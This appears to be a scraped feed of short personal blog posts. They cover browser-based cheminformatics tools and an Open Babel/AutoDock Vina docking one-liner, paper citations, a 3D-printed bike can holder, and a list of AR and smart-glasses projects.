The simplest solution, is to use a USB webcam. I used an old Logitech C310 that was collecting dust. I was surprised to find that Logitech is still selling it after years and proudly advertising it! (5MP)
It did not sit well on my laptop, so I placed it on my definitely-not-Joby Gorrila Pod i had bought on Amazon for ~₹500
]]>
Here, I have compiled a list of some libraries and possible ideas. I, personally, like static websites which don't require a server side application and can be hosted on platforms like GitHub Pages. Or, just by opening the HTML file and running it in your browser. WebAssembly (Wasm) has made running code written for other platforms on the web relatively easier. Combine Wasm with some pure JavaScript libraries, and you get a platform to quickly amp up your speed in some common tasks.
RDKit bundles a minimal JavaScript Wrapper in their core RDKit suite. This is perfect for generating 2D Figures (HTML5 Canva/SVGs), Canonical SMILES, Descriptors e.t.c
This can be used to flag undesirable functional groups in a given compound. Create a simple key:value pairs of name:SMARTS and use it to highlight substructure matches. Thus, something like PostEra's Medicinal Chemistry Alert can be done with RDKit-JS alone.
This is useful to calculate basic properties of a given compound.
Webina is a JavaScript/Wasm library that runs AutoDock Vina, which can enable you to run Molecular Docking straight in the browser itself.
Obviously, it takes a few hits in the time to complete the docking because the code is transpiled from C++ to Wasm. But, the only major drawback (for now) is that it uses SharedArrayBuffer. Due to Spectre, this feature was disabled on all browsers. Currently, only Chromium-based and Firefox browsers have reimplemented and enabled it. Hopefully, soon, this will be again supported by all major browsers.
Frameworks have now evolved enough to allow exporting models to be able to run them through JavaScript/Wasm backend. An example task can be NER or Named-entity Recognition. It can be used to extract compounds or diseases from a large blob of text and then matched with external references. Another example is target-prediction right in the browser: CHEMBL - Target Prediction in Browser
CHEMBL Group is first training the model using PyTorch (A Python ML Library), then converting it to the ONNX runtime. A model like this can be directly implemented in TensorFlow, and then exported to be able to run with TensorFlow.js
The project aims to port cheminformatics libraries into JavaScript via Emscripten. They have ported InChI, Indigo, OpenBabel, and OpenMD
It is written by @partridgejiang, who is behind the Cheminfo-to-web project
It is molecule-centric, focusing on providing the ability to represent, draw, edit, compare and search molecule structures on web browsers.
The previous machine learning examples can be packaged as browser-extensions to perform tasks on the article you are reading. With iOS 15 bringing WebExtensions to iOS/iPadOS, the same browser extension source code can be now used on Desktop and Mobile Phones. You can quickly create an extension to convert PDB codes into links to RCSB, highlight SMILES, highlight output of NER models, e.t.c
I have not even touched all the bases of cheminformatics for the web here. There is still a lot more to unpack. Hopefully, this encourages you to explore the world of cheminformatics on the web.
obabel -:"$(pbpaste)" --gen3d -opdbqt -Otest.pdbqt && vina --receptor lu.pdbqt --center_x -9.7 --center_y 11.4 --center_z 68.9 --size_x 19.3 --size_y 29.9 --size_z 21.3 --ligand test.pdbqt
To run this command you simple copy the SMILES structure of the ligand you want an it automatically takes it from your clipboard, generates the 3D structure in the AutoDock PDBQT format using Open Babel and then docks it with your receptor using AutoDock Vina, all with just one command.
Let me break down the commands
obabel -:"$(pbpaste)" --gen3d -opdbqt -Otest.pdbqt
pbpaste
and pbcopy
are macOS commands for pasting and copying from and to the clipboard. Linux users may install the xclip
and xsel
packages from their respective package managers and then insert these aliases into their bash_profile, zshrc e.t.c
alias pbcopy='xclip -selection clipboard'
alias pbpaste='xclip -selection clipboard -o'
$(pbpaste)
This is used in bash to evaluate the results of a command. In this scenario we are using it to get the contents of the clipboard.
The rest of the command is a normal Open Babel command to generate a 3D structure in PDBQT format and then save it as test.pdbqt
&&
This tells the terminal to only run the next part if the previous command runs successfully without any errors.
vina --receptor lu.pdbqt --center_x -9.7 --center_y 11.4 --center_z 68.9 --size_x 19.3 --size_y 29.9 --size_z 21.3 --ligand test.pdbqt
This is just the docking command for AutoDock Vina. In the next part I will tell how to use PyMOL and a plugin to directly generate the coordinates in Vina format --center_x -9.7 --center_y 11.4 --center_z 68.9 --size_x 19.3 --size_y 29.9 --size_z 21.3
without needing to type them manually.
Based on the project showcased at Toyota Hackathon, IITD - 17/18th December 2018
Edit: It seems like I haven't mentioned Adrian Rosebrock of PyImageSearch anywhere. I apologize for this mistake.
Recommended citation:
Chauhan, N. (2019). "Detecting Driver Fatigue, Over-Speeding, and Speeding up Post-Accident Response." <i>International Research Journal of Engineering and Technology (IRJET), 6(5)</i>.
@article{chauhan_2019, title={Detecting Driver Fatigue, Over-Speeding, and Speeding up Post-Accident Response}, volume={6}, url={https://www.irjet.net/archives/V6/i5/IRJET-V6I5318.pdf}, number={5}, journal={International Research Journal of Engineering and Technology (IRJET)}, author={Chauhan, Navan}, year={2019}}
]]>
This is still a pre-print.
Recommended citation:
Chauhan, N. (2020, March 15). Is it possible to programmatically generate Vaporwave?. https://doi.org/10.35543/osf.io/9um2r
Chauhan, Navan. “Is It Possible to Programmatically Generate Vaporwave?.” IndiaRxiv, 15 Mar. 2020. Web.
Chauhan, Navan. 2020. “Is It Possible to Programmatically Generate Vaporwave?.” IndiaRxiv. March 15. doi:10.35543/osf.io/9um2r.
@misc{chauhan_2020,
title={Is it possible to programmatically generate Vaporwave?},
url={indiarxiv.org/9um2r},
DOI={10.35543/osf.io/9um2r},
publisher={IndiaRxiv},
author={Chauhan, Navan},
year={2020},
month={Mar}
}
]]>
This is still a pre-print.
]]>Ever wanted a nice craft soda, or a natty light during your ride? Mounts to the standard bottle cage holes on your bike.
Printed on an Anycubic Kobra 2 (0.20mm resolution w/ 0.40mm nozzle at 40% Infill)
Download Link: Github
The OpenSCAD code can be modified to support tall boys and stovepipe cans. Email me if you need help generating more variations
]]>Last Updated: 2022-12-17
All projects listed here are in the following format:
Name | Company | Notes |
---|---|---|
Hololens | Microsoft | |
Oculus | Facebook/Meta | |
Tesseract | Jio/Tesseract | Indian "startup" |
R1 | Lynx | MR Headset |
Monocle | Brilliant Labs | Open Source Smart Monocle |
AR.js | AR-js-org | Open Source framework for AR on the web. Supports image, location and marker based tracking |
ARKit | Apple | Framework for iOS |
ARCore | Framework for Android | |
8thWall | Niantic | Framework for AR on the web |
Vaunt | Intel | Sold everything to North, the company behind Focals |
Focals | North | One of the only consumer grade smart glasses which got bought by Google :/, don't think they will ever launch a v2 now |
Would be nice to have an AR app/website that goes through all the safety checklists on our cars, so we never have to see another loose fuel line blow up the entire car.
Possible solution: Add a fiduciary marker under the hood of the car and use it to highlight areas which need to be checked, or multiple markers which are activated in a particular order and show up as disabled until you complete the previous step.
Although App Clips on iOS have limited capabilities available to them, ARKit is one of them. This means, a QR code / NFC trigger can be used to launch a mini ARKit based App Clip.
Not every pair of smart glasses need to have AR based surface tracking / SLAM, to display stuff. Just a simple display which can overlay elements on the real world should be capable of displaying tons of data
]]>